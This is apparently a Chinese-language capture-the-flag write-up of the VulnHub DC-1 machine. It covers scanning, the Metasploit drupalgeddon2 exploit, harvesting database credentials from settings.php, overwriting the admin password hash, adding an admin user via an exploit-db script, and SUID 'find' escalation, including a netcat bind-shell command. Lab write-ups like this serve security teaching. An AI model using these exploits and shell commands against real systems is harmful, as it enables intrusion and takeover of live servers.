DC1

admin 2025年2月8日00:46:26评论11 views字数 3155阅读10分31秒阅读模式

DC1

靶机地址:https://www.vulnhub.com/entry/dc-1,292/

攻击者ip:192.168.56.108 桥接(自动) vmare受害者ip :192.168.56.111 仅主机 vmbox

参考:https://zhuanlan.zhihu.com/p/135342104

https://blog.csdn.net/weixin_45451139/article/details/113095195

https://www.cnblogs.com/kbhome/p/13296397.html

https://blog.csdn.net/weixin_40416851/article/details/127735618

主机发现

arp-scan -l

nmap -sP 192.168.56.0/24

DC1

扫描端口

nmap -p- 192.168.56.111

nmap -p22,80,111,39404 -sV 192.168.56.111

DC1

111端口rpcbind漏洞

该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。

漏洞利用&补丁:https://github.com/guidovranken/rpcbomb

metasploit模块探测

msfconsole            use auxiliary/scanner/misc/sunrpc_portmapper            //发现端口信息的一个模块            show options            set rhosts 192.168.1.106            show info            //查看模块信息            run            .....            searchsploit rpcbind            

DC1

nmap探测

nmap -p 111 --script=rpcinfo 192.168.56.111

DC1

访问web页面

没找到sql注入,弱口令,(有次数限制)但是有框架漏洞,drupal

DC1

Metersploit,启动

msfconsole启动            search drupal查找drupal框架相关的模块            

DC1

用2018的测试

use 1或者use exploit/unix/webapp/drupal_drupalgeddon2使用对应模块            show options查看需要设置的信息            set RHOST 192.168.56.111 受害者ip            set LHOST 192.168.56.108 攻击者ip            run/exploit攻击            

DC1

找到flag1.txt,权限低并且不是交互的shell,所以我们要进入交互式的shell

Every good CMS needs a config file - and so do you. 每个好的CMS都需要一个配置文件——您也一样。

DC1

根据flag1.txt提示

DC1

DC1

在settings.php找到flag2,和mysql的账密

dbuser/R0ck3t

Brute force and dictionary attacks aren't the

·only ways to gain access (and you WILL need access).

·What can you do with these credentials?暴力和字典攻击不是*获得访问权限的唯一方法(您将需要访问权限)。*您可以用这些凭证做什么?

DC1

输入shell命令,反弹shell,进入mysql

python -c 'import pty; pty.spawn("/bin/bash")'

DC1

mysql查询

show database;            use drupaldb;            show tables;            select * from users;            select name,pass from users;            

DC1

DC1

1.找flag3

发现admin账号和经过加密的密码,drupal常用密码加密是MD5格式,但是7.0以后因为安全性问题将加密方式改成了hash加密(由于很多在线MD5爆破和MD5数据库,可以查到很多MD5码的原文,所以Drupal 7已不再采用Drupal 6和5简单的MD5加密,而是采用一种新型的Hash加密方法。新型加密方法是“加了盐(Salt)”的MD5码,简单理解就是并不会直接将password进行MD5加密,而会和用户名或其它随机字符串组合在一起后再MD5加密。)。

在官方文档找到改密码的方法,https://drupalchina.cn/node/2128

DC1

改admin的密码,admin/admin

exit            cd /var/www            ./scripts/password-hash.sh admin            password: adminhash: $S$D9.4RYOGpL0RQ8DHp5EK/qUFspREo388yrJSPpbqfAsS.ocDJtcu            mysql -u dbuser -p            Enter password: R0ck3t            use drupaldb;            update user set pass='$S$D9.4RYOGpL0RQ8DHp5EK/qUFspREo388yrJSPpbqfAsS.ocDJtcu' where name='admin';            

DC1

访问web页面,admin/admin,找到falg3

特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取阴影中的东西。

DC1

DC1

1.找flag3

查看版本

cat /var/www/includes/bootstrap.inc | grep VERSION

7.24

DC1

searchsploit drupal 可以看到历史版本的漏洞

DC1

利用drupal7.0版本漏洞增加有admin权限的用户

python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.56.111 -u xxs -p xxs666

xxs/xxs666

DC1

home找到flag4find / -name "flag4“cd /home/flag4cat flag4.txtDC1

1.find提权

flag3提示,提权并提示 -exec,想到suid提权 find 命令

使用命令查看 suid 权限的可执行二进制程序

find /root            find命令是用来在指定目录下查找文件。任何位于参数之前的字符串都将被视为欲查找的目录名。如果使用该命令时,不设置任何参数,则find命令将在当前目录下查找子目录与文件,并将查找到的子目录和文件全部进行显示。            find(选项)(参数)            -exec<执行指令>:假设find指令的回传值为True,就执行该指令            -perm<权限数值>:查找符合指定的权限数值的文件或目录            

find / -perm -4000 2>/dev/null            find flag4.txt -exec "whoami" ;            find / -name flag4.txt -exec "/bin/sh" ;            cat /root/thefinalflag.txt            

DC1

1.netcat提权

touch xxs            find xxs -exec whoami ;            find xxs -exec netcat -lvp 1111 -e "/bin/sh" ;            kali终端:netcat 192.168.56.111 1111受害者ip            

DC1

DC1

原文始发于微信公众号(王之暴龙战神):DC1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月8日00:46:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DC1https://cn-sec.com/archives/3707297.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息